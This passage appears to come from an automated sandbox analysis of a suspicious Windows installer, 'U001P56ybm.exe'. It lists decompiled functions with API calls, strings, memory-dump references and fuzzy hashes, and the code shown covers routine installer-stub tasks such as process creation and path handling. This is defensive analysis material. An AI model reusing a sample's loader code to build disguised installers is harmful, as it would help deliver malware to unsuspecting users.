				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004058A2(__ecx, "1033");
				while(1) {
					_t26 =  *0x42eba4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x42eb70; // 0x6bfe70
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x42eba0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x42e340 = _t18[1];
					 *0x42ec08 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42e33c = _t23;
						E00405889(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x429fb0, E0040594D(_t13, _t24, _t26, "foxdilaoqebdbpxrsdbw Setup", 0xfffffffe));
						_t11 =  *0x42eb8c; // 0x2
						_t27 =  *0x42eb88; // 0x6c001c
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x6c0034
								_t11 = E0040594D(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                    0x00403741
                    0x00403746
                    0x0040374c
                    0x00403751
                    0x00403751
                    0x00403759
                    0x00000000
                    0x00000000
                    0x0040375b
                    0x00403761
                    0x00403769
                    0x0040376b
                    0x00403771
                    0x00403771
                    0x00403773
                    0x0040377f
                    0x00000000
                    0x00000000
                    0x00403783
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403785
                    0x0040378a
                    0x00403793
                    0x00403799
                    0x0040379e
                    0x004037b2
                    0x004037bd
                    0x004037d5
                    0x004037db
                    0x004037e0
                    0x004037e8
                    0x00403809
                    0x00403809
                    0x00403809
                    0x004037ea
                    0x004037ec
                    0x004037ec
                    0x004037f0
                    0x004037f3
                    0x004037f7
                    0x004037f7
                    0x004037fc
                    0x00403802
                    0x00403802
                    0x00000000
                    0x004037ec
                    0x004037a0
                    0x004037a5
                    0x004037ae
                    0x004037a7
                    0x004037a7
                    0x004037a7
                    0x004037a5

                    APIs
                    • SetWindowTextA.USER32(00000000,foxdilaoqebdbpxrsdbw Setup), ref: 004037D5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: TextWindow
                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\$foxdilaoqebdbpxrsdbw Setup
                    • API String ID: 530164218-1262221224
                    • Opcode ID: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                    • Instruction ID: 6f81ae46ae74fa932ba8997680672ace7202a58944f3865a8996007a7eeda288
                    • Opcode Fuzzy Hash: 1fdd10153c028f400a2c38a9490845b69d8669821a40b98c4704357bf5f14cce
                    • Instruction Fuzzy Hash: 7511C6F9B005119BC735DF56DC80A737BADEB84316368817BEC02A7391D73DAD029A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000DBF3, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    • __woutput_l.LIBCMT ref: 1000DC4C
                      • Part of subcall function 1000ED0B: __getptd_noexit.LIBCMT ref: 1000ED0B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: __getptd_noexit__woutput_l
                    • String ID: B
                    • API String ID: 3669879410-1255198513
                    • Opcode ID: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                    • Instruction ID: fbd8d1061e38725011c376caf0138384800fd7262735a674211b68c59998f0bc
                    • Opcode Fuzzy Hash: 1dbaa59afa0ca20ca81a1cceb12b1bca4685f0abbbbc00b6d921f113fda761c5
                    • Instruction Fuzzy Hash: CD11607190421E9EFF00EFA4DC819EEB7B8FF08390F10452BE914A6285DA759905DBB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002AA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 10002AB5
                    • HeapAlloc.KERNEL32(00000000), ref: 10002ABC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Heap$AllocProcess
                    • String ID: returning %p
                    • API String ID: 1617791916-1981732286
                    • Opcode ID: 83c3263b4b244c4a1becf6e84fac9a8af30131da4209d6ec79fa8e0fb91cc3f8
                    • Instruction ID: d4a4bba9fc9d1bbfa05beefd88f2027a165b8fe1b1f70f99caa14511e1079296
                    • Opcode Fuzzy Hash: 83c3263b4b244c4a1becf6e84fac9a8af30131da4209d6ec79fa8e0fb91cc3f8
                    • Instruction Fuzzy Hash: 091117B8A00208EFEB01CF94C945B99B7F0FB4A355F208199ED095B355D775DE80DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040518B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040518B(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42bfe0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42bfe0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                    0x00405194
                    0x004051b0
                    0x004051b8
                    0x004051bd
                    0x00000000
                    0x004051c3
                    0x004051c7

                    APIs
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042BFE0,Error launching installer), ref: 004051B0
                    • CloseHandle.KERNEL32(?), ref: 004051BD
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040518B
                    • Error launching installer, xrefs: 0040519E
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CloseCreateHandleProcess
                    • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                    • API String ID: 3712363035-2984075973
                    • Opcode ID: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                    • Instruction ID: 2907f660324095bb22c49bf820cefbd87778b5f2e5ee3a47b55f65b03477d649
                    • Opcode Fuzzy Hash: b38c976d41fbf5581cd3581743b2c772e0e0d761a2224e88a4e7645e11274b50
                    • Instruction Fuzzy Hash: D6E0ECB4A14209ABEB10DF74ED0AE6F7BBCFB00344B408522AD11E2250D779E410CAB9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002B40, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19memoryregistryCOMMON
                    Download Yara Rule
                    APIs
                    • RegCloseKey.ADVAPI32(?), ref: 10002B5B
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 10002B67
                    • HeapFree.KERNEL32(00000000), ref: 10002B6E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Heap$CloseFreeProcess
                    • String ID: destroying %p
                    • API String ID: 1203615452-3738993722
                    • Opcode ID: 6d15f0788334ef2255cfa17b069852f31fc2ceb94042b73c8a2980e361fda53b
                    • Instruction ID: 58fc8df40afe2e0d57ec830e951d8b7ecae17fade34ddf6017f64ed429094b49
                    • Opcode Fuzzy Hash: 6d15f0788334ef2255cfa17b069852f31fc2ceb94042b73c8a2980e361fda53b
                    • Instruction Fuzzy Hash: 18E0ECB9500218ABE701DF94DC89FE93BACEB4D755F048004FA0D8B201C671E9808BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040541E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040541E(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                    0x0040541f
                    0x00405436
                    0x0040543e
                    0x0040543e
                    0x00405446

                    APIs
                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405424
                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030CD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 0040542D
                    • lstrcatA.KERNEL32(?,0040900C), ref: 0040543E
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040541E
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CharPrevlstrcatlstrlen
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 2659869361-3916508600
                    • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                    • Instruction ID: 104188ff39e6d10e0057bf8a610b6096ce4ad2879363e85d627e75dd9bc73d26
                    • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                    • Instruction Fuzzy Hash: 04D0A9A2609A70BEE20227159C05ECB2E08CF02729B048422F140B22D2C33C4E82CFFE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100109E0, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10010A16
                    • __isleadbyte_l.LIBCMT ref: 10010A44
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010A72
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 10010AA8
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: e499e295a7154759c7b54a9426ad05987e38316d7012233a2c8bdeec80cf8705
                    • Instruction ID: 9172e219db3ae8b0e7704ad5d01474d674e6024ad38550cc8a5b2a4d4ef7600e
                    • Opcode Fuzzy Hash: e499e295a7154759c7b54a9426ad05987e38316d7012233a2c8bdeec80cf8705
                    • Instruction Fuzzy Hash: 4C319E30700386AFEB11CE61C844BAA7BE5FF41390F568129F8958B190E7B0E890DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405889(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405889(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                    0x00401ec7
                    0x00401ecf
                    0x00401ed4
                    0x00401ed9
                    0x00401edd
                    0x00401ee0
                    0x00401ee2
                    0x00401ee9
                    0x00401ef2
                    0x00401efa
                    0x00401efd
                    0x00401f12
                    0x00401f18
                    0x00401f2b
                    0x00401f34
                    0x00401f40
                    0x00401f45
                    0x00401f45
                    0x00401f2b
                    0x00401f48
                    0x00401b75
                    0x00401b75
                    0x00401efd
                    0x00402880
                    0x0040288c

                    APIs
                    • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                    • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                    • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                      • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                    • String ID:
                    • API String ID: 1404258612-0
                    • Opcode ID: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                    • Instruction ID: 5df6cf6993c09150fb4e954c2a2c9de352bdee8941cce83e0996c7e852039ca5
                    • Opcode Fuzzy Hash: 96c576a8d7c40e70efe5b4beeaa819c74075c8ca6966c6621d7a9c446a88aaa4
                    • Instruction Fuzzy Hash: 56111C72900108BEDB01EFA5DD45DAEBBB9EF04344B20807AF501F61E1D7789A54DB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1001500D, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 08af8ea28dc8ceacf7315972b2101681c3539d15064f37e91d06e90b4030418e
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 7701253640014EFFCF529E84DC428EE3F62FB1C396B598555FA595C021D237D9B1AB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004054B2, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004054B2(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x405264
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405449(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                    0x004054bb
                    0x004054bb
                    0x004054c2
                    0x004054c5
                    0x004054ca
                    0x004054dd
                    0x004054f7
                    0x00000000
                    0x004054f7
                    0x004054e1
                    0x004054e2
                    0x004054e5
                    0x004054e6
                    0x004054ee
                    0x00000000
                    0x00000000
                    0x004054f0
                    0x004054f3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004054f3
                    0x00000000
                    0x004054d3
                    0x00000000
                    0x004054d4

                    APIs
                    • CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004054C0
                    • CharNextA.USER32(00000000), ref: 004054C5
                    • CharNextA.USER32(00000000), ref: 004054D4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CharNext
                    • String ID: dR@
                    • API String ID: 3213498283-1322173608
                    • Opcode ID: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                    • Instruction ID: ba3132894351e94c97711127f452fc04d7c27ede8e93237e74fa5b384ede3bcd
                    • Opcode Fuzzy Hash: e3875c486b2c61f66053de752efbb5dda379102a37ce04da83dd8a0f358ee579
                    • Instruction Fuzzy Hash: AAF0A751944B2165E73222AC5C44BFB6B9CDB55712F144437E600B61D186BC5CC29FBA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af7c->lfHeight =  ~(MulDiv(E004029CB(2), _t6, 0x48));
				 *0x40af8c = E004029CB(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af93 = 1;
				 *0x40af90 = _t11 & 0x00000001;
				 *0x40af91 = _t11 & 0x00000002;
				 *0x40af92 = _t11 & 0x00000004;
				E0040594D(_t18, _t24, _t26, 0x40af98,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af7c);
				_push(_t14);
				_push(_t26);
				E00405889();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                    0x00401d29
                    0x00401d42
                    0x00401d4c
                    0x00401d51
                    0x00401d5c
                    0x00401d63
                    0x00401d75
                    0x00401d7b
                    0x00401d80
                    0x00401d8a
                    0x004024aa
                    0x00401561
                    0x00402825
                    0x00402880
                    0x0040288c

                    APIs
                    • GetDC.USER32(?), ref: 00401D22
                    • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                    • CreateFontIndirectA.GDI32(0040AF7C), ref: 00401D8A
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: CapsCreateDeviceFontIndirect
                    • String ID:
                    • API String ID: 3272661963-0
                    • Opcode ID: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                    • Instruction ID: 88b098f1539f08df6dee2951bb44ee62bc7572b1891c100f3a3d81e12d825a95
                    • Opcode Fuzzy Hash: 779dcb5e768c393210178d78652cdd2675fce9384f1858524c3e2c616e5ac7a8
                    • Instruction Fuzzy Hash: 5EF04FF1A48741AEE7029770AE1BB9A3B64A715309F104939F142BA1E2C6BC04158B3F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002980, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: _memcmp
                    • String ID: (%p) %s %p %p$(%p) Unhandled Sink: %s
                    • API String ID: 2931989736-219090540
                    • Opcode ID: dee45c249a8b75032fa1bb4b3cdcab11e2839b3157a9203bba29101f923570f7
                    • Instruction ID: 155de57182236232f910310e9f0cd9fb0c5bf3b36f1450f6f00a1bd75578b52a
                    • Opcode Fuzzy Hash: dee45c249a8b75032fa1bb4b3cdcab11e2839b3157a9203bba29101f923570f7
                    • Instruction Fuzzy Hash: FC1154F9D00109BBEB10DE98DD46FAE33A8DB45344F108128FD099B246E675EA94DB72
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404C19, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404C19(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x429fc0 != _t22) {
							 *0x429fc0 = _t22;
							E0040592B(0x429fd8, 0x42f000);
							E00405889(0x42f000, _t22);
							E0040140B(6);
							E0040592B(0x42f000, 0x429fd8);
						}
						L11:
						return CallWindowProcA( *0x429fc8, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404598(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403D29(0x413);
				return 0;
			}




                    0x00404c25
                    0x00404c4a
                    0x00404c6a
                    0x00404c6d
                    0x00404c70
                    0x00404c87
                    0x00404c8d
                    0x00404c94
                    0x00404c9b
                    0x00404ca2
                    0x00404ca7
                    0x00404cad
                    0x00000000
                    0x00404cbd
                    0x00404c57
                    0x00404caa
                    0x00404caa
                    0x00000000
                    0x00404caa
                    0x00404c63
                    0x00404c65
                    0x00000000
                    0x00404c65
                    0x00404c2b
                    0x00000000
                    0x00000000
                    0x00404c32
                    0x00000000

                    APIs
                    • IsWindowVisible.USER32 ref: 00404C4F
                    • CallWindowProcA.USER32 ref: 00404CBD
                      • Part of subcall function 00403D29: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403D3B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Window$CallMessageProcSendVisible
                    • String ID:
                    • API String ID: 3748168415-3916222277
                    • Opcode ID: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                    • Instruction ID: d407fede90f1340f75a9edbd02c1d8e6092547d547c096207559e891c258f88e
                    • Opcode Fuzzy Hash: ea1295a8c6bde433973a6376a8295198ffc5156557007cb4ade3dbcb01cff8e9
                    • Instruction Fuzzy Hash: C1119D71105608BFEF21AF52DD4099B3729EF84769F01803AFA05751E1C37D8C62CB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10002EE0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • unsupported interface: %s, xrefs: 10002F65
                    Memory Dump Source
